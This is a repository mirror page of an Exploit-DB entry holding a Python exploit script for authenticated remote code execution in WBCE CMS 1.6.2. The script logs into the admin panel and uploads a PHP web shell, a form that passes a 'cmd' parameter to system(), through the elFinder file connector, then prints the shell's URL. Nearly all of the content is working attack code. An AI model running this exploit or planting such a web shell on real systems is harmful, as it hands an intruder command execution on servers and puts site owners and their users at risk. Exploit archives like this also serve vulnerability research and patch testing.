bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52039.py
Exploit-DB 8a32e340d5 DB: 2024-06-04 
8 changes to exploits/shellcodes/ghdb

Sitefinity 15.0 - Cross-Site Scripting (XSS)

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated)

Dotclear 2.29 - Remote Code Execution (RCE)

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Serendipity 2.5.0 - Remote Code Execution (RCE)

WBCE CMS v1.6.2 - Remote Code Execution (RCE)
2024-06-04 00:16:25 +00:00

80 lines
No EOL
2.2 KiB
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
# Date: 3/5/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wbce-cms.org/
# Software Link:
https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
# Version: 1.6.2
# Tested on: MacOS
import requests
from bs4 import BeautifulSoup
import sys
import time
def login(url, username, password):
print("Logging in...")
time.sleep(3)
with requests.Session() as session:
response = session.get(url + "/admin/login/index.php")
soup = BeautifulSoup(response.text, 'html.parser')
form = soup.find('form', attrs={'name': 'login'})
form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
form.find_all('input') if input_tag.get('type') != 'submit'}
# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
username
form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
password
post_response = session.post(url + "/admin/login/index.php", data=form_data)
if "Administration" in post_response.text:
print("Login successful!")
time.sleep(3)
return session
else:
print("Login failed.")
print("Headers received:", post_response.headers)
print("Response content:", post_response.text[:500]) # İlk 500 karakter
return None
def upload_file(session, url):
# Dosya içeriğini ve adını belirleyin
print("Shell preparing...")
time.sleep(3)
files = {'upload[]': ('shell.inc',"""<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>""", 'application/octet-stream')}
data = {
'reqid': '18f3a5c13d42c5',
'cmd': 'upload',
'target': 'l1_Lw',
'mtime[]': '1714669495'
}
response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
files=files, data=data)
if response.status_code == 200:
print("Your Shell is Ready: " + url + "/media/shell.inc")
else:
print("Failed to upload file.")
print(response.text)
if __name__ == "__main__":
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = login(url, username, password)
if session:
upload_file(session, url)
Reference in a new issue View git blame Copy permalink